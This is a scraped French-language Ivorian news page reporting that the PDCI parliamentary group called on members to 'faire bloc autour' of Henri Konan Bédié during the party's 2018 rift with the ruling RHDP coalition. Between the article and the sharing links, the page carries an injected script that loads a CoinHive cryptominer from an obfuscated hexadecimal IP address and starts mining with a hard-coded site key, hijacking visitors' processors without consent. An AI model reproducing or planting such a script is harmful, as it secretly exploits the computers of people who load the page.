Le Groupe parlementaire PDCI appelle les militants à «faire bloc autour» de Bédié
0
 

Écouter
Le Groupe parlementaire PDCI appelle les militants à «faire bloc autour» de Bédié

Le Groupe parlementaire PDCI appelle les militants à «faire bloc autour» de Bédié

APA | Lu 810 fois | Publié Il y a 28 jour(s)

Le Groupe parlementaire du Parti démocratique de Côte d’Ivoire (PDCI), un allié au pouvoir en froid avec le parti présidentiel, a appelé mercredi les cadres et militants à «faire bloc autour » de son leader, Henri Konan Bédié, dans une déclaration lue par le député Olivier Akoto.

Le Groupe parlementaire PDCI « demande aux cadres et militants de continuer à faire bloc autour du président Henri Konan Bédié et de rester sourds à la désinformation et à l’intoxication de toute nature », a dit M. Akoto dans une déclaration, au siège du parti à Cocody (Est d’Abidjan).

Suite à la décision du PDCI, le 17 juin 2018, d’examiner son adhésion ou pas au Parti unifié RHDP (Rassemblement des Houphouëtistes pour la démocratie et la paix), la coalition au pouvoir, à son prochain congrès prévu après la présidentielle de 2020, un froid s’est installé entre l’ex-parti unique et le camp présidentiel.

Le PDCI avait d’ailleurs indiqué, dans un communiqué, ne « pas être concerné » par l’Assemblée générale constitutive du Parti unifié RHDP tenue lundi. Lors de cet événement, il avait été fait mention de « membres observateurs représentant M. Bédié ».

Le Groupe parlementaire se «réjouit de ce que les cadres et militants du parti aient largement suivi le mot ordre du président Henri Konan Bédié relativement à la non-participation à l’Assemblée générale constitutive du parti unifié RHDP», poursuit la déclaration.

Les députés du groupe ont assuré à M. Bédié leur « entière disponibilité et leur soutien total dans le combat qu’il mène pour la pérennité du PDCI » tout en saluant et encouragent « tous les cadres et les militants au strict respect des résolutions du bureau politique » du parti.

Les parlementaires du PDCI ont en outre félicité « le président Henri Konan Bédié », qui pour eux représente le « digne héritier du président Félix Houphouët-Boigny, père fondateur du PDCI (notamment) pour la bonne tenue du bureau politique du 17 juin 2018 ». 

Le Groupe parlementaire PDCI qui souhaite « longue vie » à l’ex-parti unique, a appelé « les cadres, les militants et tous les Ivoiriens à demeurer dans la sérénité et dans la paix », tout en restant «vigilants et toujours à l’écoute de Bédié ». 

Cette déclaration intervient après une réunion du Groupe parlementaire du PDCI ayant porté sur l’actualité politique en Côte d’Ivoire. Elle s’est tenue à la Maison du parti en présence de « plus de 90 députés » issus de l’ex-parti unique. 

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Urgent | Mort d'Aretha Franklin, la Reine de la Soul (médias américains)

Grand-Bassam accueille ce jeudi les célébrations marquant le lancement officiel de la semaine mondiale de l'allaitement.

Niger: 22 personnes mortes du choléra dans la région de Maradi

Un enseignant de Dimbokro relève des erreurs dans la définition de l’aimant

Tiébissou: Un camion surchargé de sacs de charbon coupe des câbles électriques et téléphoniques occasionnant ainsi un délestage